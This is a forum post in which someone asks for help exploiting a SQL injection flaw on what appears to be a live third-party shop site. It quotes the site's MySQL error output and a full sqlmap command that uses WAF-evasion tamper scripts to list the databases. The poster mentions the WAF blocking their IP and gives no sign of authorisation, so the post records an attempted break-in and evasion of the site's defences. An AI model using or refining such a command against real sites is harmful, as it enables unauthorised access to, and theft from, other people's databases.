hello everyone, I'm sorry for not being able to speak Russian. I can translate if necessary but I thought I'd try it in english first.

I got a site which is vulnerable to SQL injection, however whatever I try it doesn't exploit the vulnerability. Also the WAF blocks some payloads, so I used Atlas(https://github.com/m4ll0k/Atlas) to identify the WAF, but it didn't manage to identify it, however it suggested me some tampers to use before the WAF blocked my IP. This is the response I get when I manually type in ' behind this site:

https://www.site.xx/xxxx/product.php?id=47' (I enter the ' myself)

"MySQL error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' AND p.products_status = 1 GROUP BY p.products_id' at line 1

SELECT * FROM products AS p LEFT JOIN products_description AS pd ON p.products_id=pd.products_id WHERE p.products_id = 47\\\' AND p.products_status = 1 GROUP BY p.products_id

TEP_DB_ERROR"


command used:

sqlmap -u https://www.site.xx/xxxx/product.php?id=47 --random-agent --level=5 --risk=3 --dbs --tamper=htmlencode,charunicodeencode,modsecurityver sioned,modsecurityzeroversioned,multiplespaces

Anyone knows how I could exploit?